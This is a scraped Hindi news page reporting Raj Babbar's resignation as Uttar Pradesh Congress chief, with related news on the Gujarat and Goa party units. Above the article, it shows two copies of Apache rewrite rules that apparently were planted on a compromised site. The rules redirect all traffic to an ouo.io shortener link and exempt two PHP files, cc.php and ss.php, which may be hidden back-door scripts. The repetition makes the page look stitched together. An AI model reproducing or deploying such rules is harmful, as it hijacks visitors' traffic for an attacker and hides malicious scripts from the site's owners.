
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 824
Previousनई दिल्ली। कांग्रेस में इन दिनों इस्तीफों का दौर चल पड़ा है। गत दिनों गुजरात और गोवा के बाद अब यूपी कांग्रेस अध्यक्ष ने भी अपने पद से इस्तीफा दे दिया है। जानकारी के अनुसार राज बब्बर ने यूपी कांग्रेस अध्यक्ष पद से इस्तीफा दे दिया है। अब कयास लगाए जा रहे हैं कि ब्राह्मण चेहरे को इस पद पर नियुक्त किया जा सकता है। हालांकि बताया जा रहा है कि अभी तक उनका इस्तीफा हाईकमान ने स्वीकार नहीं किया है।
राज बब्बर ने इस संबंध में कहा कि मुझे एक विशेष काम देकर यहां भेजा गया था। मैं जितना काम कर सकता था, उतना काम किया। राज बब्बर को 2017 यूपी विधानसभा चुनाव के समय कांग्रेस के प्रदेश अध्यक्ष की कमान मिली थी।
आपको बता दें कि गुजरात प्रदेश कांग्रेस समिति (जीपीसीसी) के अध्यक्ष भरत सिंह सोलंकी ने अपने पद से इस्तीफे की अफवाह को खारिज कर दिया था। इस बात की अटकलें लगायी जा रहीं थी कि हाल के राज्यसभा चुनावों में टिकट नहीं दिये जाने से नाराज सोलंकी ने अपने पद से इस्तीफा दे दिया है। वहीं गोवा कांग्रेस के प्रमुख शांताराम नाइक ने अपने पद से इस्तीफा देने के बाद कहा कि पार्टी के महाधिवेशन में युवा नेतृत्व के लिए जगह बनाने को लेकर राहुल गांधी के भाषण से वह बहुत प्रभावित हैं।